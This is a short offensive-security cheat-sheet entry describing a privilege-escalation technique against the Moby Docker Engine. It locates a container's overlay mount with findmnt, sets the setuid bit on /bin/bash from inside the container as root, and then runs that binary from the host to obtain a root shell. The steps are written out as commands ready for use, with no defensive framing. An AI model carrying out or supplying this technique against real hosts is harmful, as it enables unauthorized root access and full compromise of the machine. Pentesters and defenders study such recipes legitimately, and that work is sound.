Moby Docker Engine PrivEsc
Last modified: 2023-05-02
First off, find the directory which the docker container mounted
findmnt # Results e.g. /var/lib/docker/overlay2/abcdef...xyz/merged
Assume the directory above found, we can investigate in the directory.
ls -la /var/lib/docker/overlay2/abcdef...xyz/merged/
If we can be root in the docker container, set uid arbitrary binary as below. Please note that we need to do that in the container, not the real host.
chmod u+s /bin/bash
Back to the real host machine again, execute the binary which we set uid to privilege escalation.
We should get a root shell.